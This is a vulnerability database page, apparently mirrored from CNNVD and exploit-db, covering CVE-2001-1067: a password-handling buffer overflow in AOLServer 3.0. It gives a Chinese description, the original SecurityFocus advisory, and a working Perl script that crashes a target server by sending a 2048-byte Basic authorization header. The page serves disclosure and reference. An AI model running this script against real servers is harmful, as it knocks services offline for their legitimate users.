AOLServer超长验证串远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106469 漏洞类型 未知
发布时间 2001-08-22 更新时间 2005-05-02
CVE编号 CVE-2001-1067 CNNVD-ID CNNVD-200108-188
漏洞平台 Unix CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21088
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-188
|漏洞详情
AOLServer是美国在线的开放源码的,免费的HTTP服务器,由美国在线和开放源码组织维护。它提供TCL解释支持、多线程、动态网页,可用于大容量和动态的网站。AOLServer处理口令字串存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞进行拒绝服务攻击。当远程攻击者给AOLServer发送的口令超过2048字节将会引起缓冲溢出,会覆盖堆栈变量和返回地址,使AOLServer崩溃。远程攻击者甚至可能以AOLServer进程的权限执行任意代码,获得本地访问权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3230/info

AOLServer is a freely available, open source web server. It was originally written by AOL, and is currently developed and maintained by AOL and public domain.

A problem has been discovered that can allow remote users to crash an AOLServer, denying service to legitimate users of the system. The problem is due to the handling of passwords. It is possible for a remote user to overflow a buffer within the AOLServer process by sending a password of 2048 bytes. This could result in the overwriting of stack variables, including the return address.

This makes it possible for a remote user to execute arbitrary code with the privileges of the AOLServer process, and potentially gain local access.

#!/usr/bin/perl

## Nate Haggard <nate@securitylogics.com>
## AOLserver 3.0 vulnerability
## August 22, 2001

use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                 PeerAddr  => $host,
                                 PeerPort  => "http(80)",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host\n" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;
|参考资料

来源:BID
名称:3230
链接:http://www.securityfocus.com/bid/3230
来源:XF
名称:aolserver-long-password-dos(7030)
链接:http://xforce.iss.net/static/7030.php
来源:BUGTRAQ
名称:20010822AOLserver3.0vulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-08/0325.html
来源:BUGTRAQ
名称:20010906AOLserverexploitcode
链接:http://www.securityfocus.com/archive/1/213041